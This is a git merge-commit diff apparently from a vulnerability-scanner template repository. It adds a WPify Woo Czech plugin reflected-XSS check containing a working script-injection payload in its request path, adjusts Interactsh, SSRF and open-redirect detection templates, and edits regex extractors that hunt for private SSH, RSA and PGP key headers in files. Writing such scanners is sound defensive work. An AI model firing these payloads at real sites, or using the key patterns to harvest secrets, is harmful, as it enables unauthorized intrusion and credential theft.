Merge branch 'master' into dashboard

patch-1
Prince Chaddha 2022-06-28 08:42:51 +05:30 committed by GitHub
commit 28d6f55f15
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
7 changed files with 70 additions and 25 deletions

View File

@ -22,3 +22,4 @@ vulnerabilities/other/royalevent/royalevent-management-xss.yaml
vulnerabilities/other/royalevent/royalevent-stored-xss.yaml vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
vulnerabilities/wordpress/new-user-approve-xss.yaml vulnerabilities/wordpress/new-user-approve-xss.yaml
vulnerabilities/wordpress/sym404.yaml vulnerabilities/wordpress/sym404.yaml
vulnerabilities/wordpress/wpify-woo-czech-xss.yaml

View File

@ -28,10 +28,10 @@ requests:
- type: word - type: word
words: words:
- "<h1> Interactsh Server </h1>" - "Interactsh Server"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/06/27 # Enhanced by mp on 2022/06/27

View File

@ -15,7 +15,10 @@ info:
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2021-22873 cve-id: CVE-2021-22873
cwe-id: CWE-601 cwe-id: CWE-601
tags: cve,cve2021,redirect metadata:
shodan-query: http.favicon.hash:106844876
verified: "true"
tags: cve,cve2021,redirect,revive
requests: requests:
- method: GET - method: GET
@ -30,12 +33,8 @@ requests:
stop-at-first-match: true stop-at-first-match: true
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers-condition: and
matchers: matchers:
- type: status - type: regex
status: part: header
- 200 regex:
- type: word - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
words:
- "<h1> Interactsh Server </h1>"
part: body

View File

@ -12,6 +12,9 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
classification: classification:
cve-id: CVE-2021-27748 cve-id: CVE-2021-27748
metadata:
verified: true
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve,cve2021,hcl,ibm,ssrf,websphere tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests: requests:
@ -28,9 +31,8 @@ requests:
- type: word - type: word
words: words:
- "<h1> Interactsh Server </h1>" - "Interactsh Server"
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/06/27

View File

@ -13,12 +13,12 @@ file:
extractors: extractors:
- type: regex - type: regex
regex: regex:
- "\"BEGIN OPENSSH PRIVATE KEY\"" - "BEGIN OPENSSH PRIVATE KEY"
- "\"BEGIN PRIVATE KEY\"" - "BEGIN PRIVATE KEY"
- "\"BEGIN RSA PRIVATE KEY\"" - "BEGIN RSA PRIVATE KEY"
- "\"BEGIN DSA PRIVATE KEY\"" - "BEGIN DSA PRIVATE KEY"
- "\"BEGIN EC PRIVATE KEY\"" - "BEGIN EC PRIVATE KEY"
- "\"BEGIN PGP PRIVATE KEY BLOCK\"" - "BEGIN PGP PRIVATE KEY BLOCK"
- "\"ssh-rsa\"" - "ssh-rsa"
- "\"ssh-dsa\"" - "ssh-dsa"
- "\"ssh-ed25519\"" - "ssh-ed25519"

View File

@ -4,6 +4,9 @@ info:
name: Interactsh Server name: Interactsh Server
author: pdteam author: pdteam
severity: info severity: info
metadata:
verified: true
shodan-query: http.html:"Interactsh Server"
tags: tech,interactsh tags: tech,interactsh
requests: requests:
@ -11,14 +14,19 @@ requests:
path: path:
- "{{BaseURL}}" - "{{BaseURL}}"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "<h1> Interactsh Server </h1>" - "Interactsh Server"
- type: status
status:
- 200
extractors: extractors:
- type: regex - type: regex
group: 1 group: 1
regex: regex:
- '<b>(.*)<\/b> server' - '<b>(.*)<\/b> server'
- 'from <b>(.*)<\/b>' - 'from <b>(.*)<\/b>'

View File

@ -0,0 +1,35 @@
id: wpify-woo-czech-xss
info:
name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)
author: Akincibor
severity: medium
description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
reference:
- https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
metadata:
verified: true
tags: wp,wordpress,xss,wp-plugin,wpify
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- 'Add a new VAT ID to the queue'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200